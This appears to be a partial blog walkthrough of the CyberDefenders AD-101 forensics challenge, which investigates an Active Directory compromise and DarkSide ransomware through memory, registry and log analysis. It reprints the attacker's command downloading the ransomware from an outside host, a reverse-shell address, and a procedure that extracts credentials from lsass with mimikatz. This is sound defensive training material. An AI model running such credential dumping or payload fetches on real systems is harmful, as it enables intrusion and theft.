CyberDefenders - AD-101 CTF
Intro
CyberDefenders.org, hosted a challenging Windows Domain compromise challenge. An ActiveDirectory compromise case: where adversaries were able to take over corporate domain controller. You the challenger/IR team have to investigate the case and reveal the Who, When, What, Where, Why, and How.
For those that don’t know about CyberDefenders they host a platform deticated to training BlueTeam skills: Incident response, digital forensics, security analysts, etc). If you are used to VulnHub and Hack-the-box, these services are typically geared more towards redteaming and penetration testing. This is where CyberDefenders stand out!
Walkthrough
This is currently a partial write-up, due to limited time. We will update this post accordingly in the near future!
1) What is the OS Product name of PC01?
Hint:
- Registry
- SOFTWARE Hive
- Microsoft\Windows NT\CurrentVersion
Answer:
Windows 10 Enterprise 2016 LTSB
2) On 21st November, there was unplanned power off for PC01 machine. How long was PC01 powered on till this shutdown?
Hint:
- Windows Event logs
- System
Answer:
11:31
3) Who was the last logged-in user on PC01?
vol.py -f memory.dmp windows.envars.Envars|grep USERNAME
...
3140 svchost.exe 0x9f19e0 USERNAME 0xMohammed
...
Answer:
0xMohammed
4) What is the IP address of PC01?
regsitry
- SYSTEM Hive
- \CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
Answer:
192.168.112.142
5) Which port was assigned to man service on PC01?
Hint:
- Windows/System32/drivers/etc/services
Answer:
9535
6) What is the “Business.xlsx” LogFile Sequence Number?
Parse the MFT:
46494C45 30000300 BC82C754 00000000 03000200 38000100 D8010000 00040000
00000000 00000000 06000000 2ECE0300 25000000 00000000 10000000 60000000
00000000 00000000 48000000 18000000 BB5962C0 D8DFD701 942210BB D8DFD701
C3A8DAC3 D8DFD701 BB5962C0 D8DFD701 20000000 00000000 00000000 00000000
00000000 A9040000 00000000 00000000 C080AC3B 00000000 30000000 78000000
00000000 00000500 5A000000 18000100 00600100 00000200 BB5962C0 D8DFD701
942210BB D8DFD701 A6F227BB D8DFD701 BB5962C0 D8DFD701 00200000 00000000
DE1F0000 00000000 20000000 00000000 0C024200 55005300 49004E00 45007E00
31002E00 58004C00 53000000 00000000
BC82C754 00000000 converted to int…
Answer:
1422361276
7) What is the GUID of the C drive on PC01 machine?
Notes:
Windows Registry
SYSTEM
MountedDevices c:
8cf4cfff-49a3-11ec-910f-806e6f6e6963
not right?
USB forensics - fad905b3-fb35-4dbd-ab31-a44f022809d2
Answer:
fad905b3-fb35-4dbd-ab31-a44f022809d2
8) What link did the user visit on 2021-11-22 at 19:45:55 UTC?
Hint:
- make sure you note the correct address, one of the addresses is a typo
- firfox forensics
- places.sqlite
- moz_places
Answer:
bluedemy.cyberdefenders.org
9) How many bytes were received by firefox?
Hint:
- https://github.com/markmckinnon/Autopsy-Plugins/releases/tag/1.3
Answer:
20418287
10) What is the folder name where note.txt resides?
? someone else worked this out as …
Answer:
asd
11) Which volatility 2 profile should be used to analyze the memory image?
Answer:
Win2016x64_14393
12) Analyzing the memory what is the physical address of the SOFTWARE registry hive?
Answer:
0x00000000040f7000
13) What is the master key of the user “0xMohammed”?
Hint:
- Windbg (as admin)
- Mimilib.dll
0: kd> !analyze -v
0: kd> .load c:\Users\user\Desktop\mimilib.dll
0: kd> !process 0 0 lsass.exe
PROCESS ffffba033ef746c0
SessionId: 0 Cid: 02a0 Peb: 352af59000 ParentCid: 021c
DirBase: 107683000 ObjectTable: ffff860c09526000 HandleCount: <Data Not Accessible>
Image: lsass.exe
0: kd> .process /r /p ffffba033ef746c0
Implicit process is now ffffba03`3ef746c0
Loading User Symbols
................................................................
........................................................
0: kd> !mimikatz
Answer:
1652c67aa6719519492e67d1b39cab91e7804eb26b259ff351b60df34ee808804314cbfbcf03afbf3bae3ef2790f2c363ca0a9c8791e0e80d490c26afe77c3be
13) Using the provided word list, what is the password of the user “0xMohammed”?
Memory analysis and disk extraction?
samdump2 /tmp/SYSTEM /tmp/SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
0xMohammed:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
they are all blank???
Grep and search the file for something that stands out?
Hint:
- grepping the password file
- grep -i ^.{10}! ~/Downloads/AD-101/wordlist.txt
Hint:
- Windbg (as admin)
- Mimilib.dll
0: kd> !analyze -v
0: kd> .load c:\Users\user\Desktop\mimilib.dll
0: kd> !process 0 0 lsass.exe
PROCESS ffffba033ef746c0
SessionId: 0 Cid: 02a0 Peb: 352af59000 ParentCid: 021c
DirBase: 107683000 ObjectTable: ffff860c09526000 HandleCount: <Data Not Accessible>
Image: lsass.exe
0: kd> .process /r /p ffffba033ef746c0
Implicit process is now ffffba03`3ef746c0
Loading User Symbols
................................................................
........................................................
0: kd> !mimikatz
Answer:
0xmohammed!
14) What is the name of the first malware detected by Windows Defender?
Hint:
- EventID: 1116
Answer:
Exploit:Win32/ShellCode.BN
15) Provide the date and time when the attacker clicked send (submitted) the malicious email?
Hint:
- Users/labib/Documents/OutLook files/outlook.pst
- https://goldfynch.com/goldfynch-pst-viewer
Answer:
12/08/2021 04:47:48 AM
16) What is the IP address and port on which the attacker received the reverse shell? IP:PORT
Hint: Hint:
- olevba
- pcode
- run the sample in a sandbox
Answer:
192.168.112.128:8080
17) Analyzing the reverse shell. What is the first argument given to InternetErrorDlg API?
Hint:
- olevba
- pcode
Answer:
11223344
18) What is the MITRE ID of the technique used by the attacker to achieve persistence?
Answer:
T1053.005 (Scheduled Task)
19) What is the attacker’s C2 domain name?
Answer:
c2.cyberdefenders.org
20) What is the name of the tool used by the attacker to collect AD information?
Hint:
- Windows Event logs
- Powershell
- Invoke-ACL.ps1
Answer:
bloodhound
21) What is the PID of the malicious process?
Hint:
- volatility malfind
Answer:
3140
22) What is the family of ransomware
Answer:
darkside
23) What is the command invoked by the attacker to download the ransomware?
Answer:
Invoke-WebRequest http://192.168.112.128:8000/svchost.exe -OutFile svchost.exe
24) Provide the number of ransomware process’ privileges that are enabled by default?
python vol.py -f -f ~/Downloads/AD-101/AD-MEM/memory.dmp --profile=Win2016x64_14393 privs -p 3140
Note: 34 - but only need to count the default and enabled
Answer:
25
25) What is the pool tag of the ransomware process?
python vol.py -f ~/Downloads/AD-101/AD-MEM/memory.dmp --profile=Win2016x64_14393 psxview |grep 3140
Volatility Foundation Volatility Framework 2.6.1
0x0000000022e48800 svchost.exe 3140 True False True False True True False
wrong use vaddump
python vol.py -f ~/Downloads/AD-101/AD-MEM/memory.dmp --profile=Win2016x64_14393 vaddump -p 3140 --dump-dir AD101
Volatility Foundation Volatility Framework 2.6.1
Pid Process Start End Result
---------- -------------------- ------------------ ------------------ ------
3140 svchost.exe 0x00000000606e0000 0x0000000060731fff AD101/svchost.exe.22e46800.0x00000000606e0000-0x0000000060731fff.dmp
0x0000000022e46800 - cbDataOffsetPoolHdr (x5c + x4) =
0x0000000022e46800 - x60 =
0x22E467A0
dt("_POOL_HEADER",0x22E467A0, space=addrspace().base)
[_POOL_HEADER _POOL_HEADER] @ 0x22E467A0
0x0 : PoolIndex 0
0x0 : PreviousSize 2
0x0 : Ulong1 42336258
0x2 : BlockSize 134
0x2 : PoolType 2
0x4 : PoolTag 1280133197
1280133197 long to hex conversion
4c4d484d
wrong endianess to swap endian
4d484d4c
convert to string
MHML
Answer:
MHML
26) What is the address where the ransomware stored the 567-byte key under the malicious process’ memory?
strings the malicious process - identity ransom message and key
key:
lsJTyyTnzJlGQ1I6sfwV6oVcXaRyn...
python vol.py --plugins=volatility-firefox -f ~/Downloads/AD-101/AD-MEM/memory.dmp --profile=Win2016x64_14393 yarascan -p 3140 -Y "lsJTyyTn..."
Volatility Foundation Volatility Framework 2.6.1
Rule: r1
Owner: Process svchost.exe Pid 3140
0x00b5f4a5 6c 73 4a 54 79 79 54 6e 7a 4a 6c 47 51 31 49 36 lsJTyyTnzJlGQ1I6
0x00b5f4b5 73 66 77 56 36 6f 56 63 58 61 52 79 6e 77 4e 36 sfwV6oVcXaRynwN6
0x00b5f4c5 6d 57 70 68 41 37 42 4b 58 45 44 49 48 4a 63 44 mWphA7BKXEDIHJcD
Answer:
0x00b5f4a5
27) What is the 8-byte word hidden in the ransomware process’s memory?
Hint:
- Process Heaps
- proc().Peb.ProcessHeaps.dereference()
- db(65536)
Answer:
c0n6r475
28) What is the virtual address of the device where the ransomware file where opened?
First use filescan to find the address of the file
- 0xba033f477bc0
Then use volshell
dt('_FILE_OBJECT' ,0xffffba033f477bc0)
Answer:
0xffffba033e631460
29) What is the physical address where the ransomware file is stored in memory?
python vol.py -f ~/Downloads/AD-101/AD-MEM/memory.dmp --profile=Win2016x64_14393 yarascan -p 3140 -Y "----------- [ Welcome to DarkSide ] "
Volatility Foundation Volatility Framework 2.6.1
Rule: r1
Owner: Process svchost.exe Pid 3140
0x00b5efb0 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 5b 20 57 65 -----------.[.We
0x00b5efc0 6c 63 6f 6d 65 20 74 6f 20 44 61 72 6b 53 69 64 lcome.to.DarkSid
0x00b5efd0 65 20 5d 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d e.].------------
0x00b5efe0 2d 3e 20 0d 0a 20 20 0d 0a 20 57 68 61 74 20 68 ->........What.h
0x00b5eff0 61 70 70 65 6e 64 3f 20 0d 0a 20 2d 2d 2d 2d 2d append?....-----
0x00b5f000 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d ----------------
0x00b5f010 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d ----------------
0x00b5f020 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 0d 0a 20 59 6f 75 ---------....You
0x00b5f030 72 20 63 6f 6d 70 75 74 65 72 73 20 61 6e 64 20 r.computers.and.
0x00b5f040 73 65 72 76 65 72 73 20 61 72 65 20 65 6e 63 72 servers.are.encr
0x00b5f050 79 70 74 65 64 2c 20 62 61 63 6b 75 70 73 20 61 ypted,.backups.a
0x00b5f060 72 65 20 64 65 6c 65 74 65 64 2e 20 57 65 20 75 re.deleted..We.u
0x00b5f070 73 65 20 73 74 72 6f 6e 67 20 65 6e 63 72 79 70 se.strong.encryp
0x00b5f080 74 69 6f 6e 20 61 6c 67 6f 72 69 74 68 6d 73 2c tion.algorithms,
0x00b5f090 20 73 6f 20 79 6f 75 20 63 61 6e 6e 6f 74 20 64 .so.you.cannot.d
0x00b5f0a0 65 63 72 79 70 74 20 79 6f 75 72 20 64 61 74 61 ecrypt.your.data
0x00b5efb0 or -1 byte (as often the readme starts with 0xc0 (formfeed/cr)) - No....
Filescan
- Back to using filescan to find the actual file - 0xba033f477bc0
- convert virtual to physicall using volshell
addrspace().vtop(0xba033f477bc0)
Answer:
0x13c090bc0
30) What is the ransomware file’s internal name?
Answer:
calimalimodumator.exe
31) Analyzing the ransomware file. what is the API used to get the geographical location?
Hint:
- dump memory or malicious process
- strings 3140.dmp
Answer:
GetLocaleInfoA
Share on: